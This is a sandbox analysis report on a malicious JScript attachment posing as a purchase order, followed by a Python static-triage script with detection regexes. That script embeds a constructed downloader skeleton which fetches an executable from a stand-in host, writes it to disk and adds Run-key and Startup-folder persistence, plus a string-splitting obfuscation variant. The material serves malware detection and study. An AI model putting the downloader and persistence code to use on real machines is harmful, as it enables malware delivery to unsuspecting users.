General
Target: PO-Order 4500324718.js
Size: 45KB
Sample: 220628-l6sbhsgfer
MD5: f8386388be14928dcf22d1e1752be75c
SHA1: 0d9f55e0580d39acd03651379366d172517638b4
SHA256: ddb9205dd6921da69e80e86a70c935be328dfd6c9559e6bf1a7d7dda92267ceb
SHA512: 3a61511f6b2c259aeb6d97d6cb9ff2a9d316bb1029ee647c3b45c53ed03188c12d6d9f2710e37e87035943c7fc6804df37af614cf0315dac5cdcc4e4d4ae442b
Static task: static1
Behavioral task: behavioral1
  Sample: PO-Order 4500324718.js
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: PO-Order 4500324718.js
  Resource: win10v2004-20220414-en
Malware Config
Targets
Target: PO-Order 4500324718.js
Size: 45KB
MD5: f8386388be14928dcf22d1e1752be75c
SHA1: 0d9f55e0580d39acd03651379366d172517638b4
SHA256: ddb9205dd6921da69e80e86a70c935be328dfd6c9559e6bf1a7d7dda92267ceb
SHA512: 3a61511f6b2c259aeb6d97d6cb9ff2a9d316bb1029ee647c3b45c53ed03188c12d6d9f2710e37e87035943c7fc6804df37af614cf0315dac5cdcc4e4d4ae442b
Score: 10/10
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
- Blocklisted process makes network request
- Checks computer location settings: looks up the country code configured in the registry, likely a geofence.
- Drops startup file
- Adds Run key to start application
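The four behavioural signatures above (network request from a script host, registry country-code lookup, startup-folder drop, Run-key persistence) are the classic shape of a Windows Script Host downloader, and they can be pre-screened statically before a sample goes to a sandbox. The following is an added triage example, not part of the report and not the PO-Order sample's code: it runs a few regular-expression rules over a constructed JScript skeleton that reproduces those behaviours, after joining split string literals ("Reg" + "Write") so that trivial concatenation obfuscation does not hide the keywords. The registry value it looks for as the geofence indicator, HKCU\Control Panel\International\Geo\Nation, is the standard Windows GeoID location; the report does not say which key this sample reads, so that mapping is an assumption. The sample script, rule names and verdict thresholds are all constructed for illustration.

```python
import re

# Constructed sample for this example (NOT the PO-Order sample from the report):
# a minimal WSH downloader skeleton showing the behaviours the signatures list.
SAMPLE_JS = r'''
var sh = new ActiveXObject("WScript.Shell");
var geo = sh.RegRead("HKCU\\Control Panel\\International\\Geo\\Nation");
if (geo == "203") WScript.Quit();
var x = new ActiveXObject("MSXML2.XMLHTTP");
x.open("GET", "http://example.invalid/a.exe", false);
x.send();
var s = new ActiveXObject("ADODB.Stream");
s.Type = 1; s.Open(); s.Write(x.responseBody);
var out = sh.ExpandEnvironmentStrings("%TEMP%") + "\\svc.exe";
s.SaveToFile(out, 2);
sh.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svc", out);
var fso = new ActiveXObject("Scripting.FileSystemObject");
fso.CopyFile(WScript.ScriptFullName, sh.SpecialFolders("Startup") + "\\svc.js");
'''

# Constructed variant: same logic with split string literals and bracket
# property access, a common trick against naive keyword grep.
OBFUSCATED_JS = r'''
var sh = new ActiveXObject("WScr" + "ipt.Shell");
var x = new ActiveXObject("MSXML2" + ".XMLHTTP");
var s = new ActiveXObject('ADODB' + '.Stream');
sh["Reg" + "Write"]("HK" + "CU\\Software\\Micro" + "soft\\Windows\\CurrentVersion\\Run\\svc", out);
'''

# Static indicators; names are this example's own, not sandbox signature IDs.
# Registry paths in JScript source carry doubled backslashes, hence \\+ .
RULES = {
    "geofence_registry":   re.compile(r'International\\+Geo\\+Nation', re.I),
    "http_download":       re.compile(r'MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest', re.I),
    "binary_drop":         re.compile(r'ADODB\.Stream', re.I),
    "run_key_persistence": re.compile(
        r'RegWrite\W{0,3}\(\s*["\']HK(CU|LM)\\+Software\\+Microsoft\\+Windows\\+CurrentVersion\\+Run',
        re.I),
    "startup_folder_drop": re.compile(r'SpecialFolders\W{0,3}\(\s*["\']Startup["\']', re.I),
}

# "abc" + "def" (same quote style on both sides) -> "abcdef"
CONCAT = re.compile(r'(["\'])\s*\+\s*\1')


def normalize(src):
    """Join adjacent string literals until nothing changes, so split keywords match."""
    prev = None
    while prev != src:
        prev, src = src, CONCAT.sub('', src)
    return src


def triage(src):
    """Return {rule_name: matched} for every static rule."""
    src = normalize(src)
    return {name: bool(rx.search(src)) for name, rx in RULES.items()}


def extract_urls(src):
    """Pull plain http(s) URLs out of the (normalized) source for IOC reporting."""
    return sorted(set(re.findall(r'https?://[^\s"\'\)]+', normalize(src))))


def verdict(hits):
    """Download + write-to-disk + persistence is the downloader chain; anything
    less is only suspicious. Thresholds are this example's choice."""
    persistence = hits["run_key_persistence"] or hits["startup_folder_drop"]
    if hits["http_download"] and hits["binary_drop"] and persistence:
        return "likely_downloader"
    if any(hits.values()):
        return "suspicious"
    return "inconclusive"


if __name__ == "__main__":
    for label, src in (("plain", SAMPLE_JS), ("obfuscated", OBFUSCATED_JS)):
        hits = triage(src)
        print(label, verdict(hits), [k for k, v in hits.items() if v], extract_urls(src))
```

These rules only catch keyword-level obfuscation; String.fromCharCode tables, eval of decoded blobs or reversed strings need a real emulation or the sandbox run that produced the signatures above. Treat a static "inconclusive" as no evidence either way, never as clean.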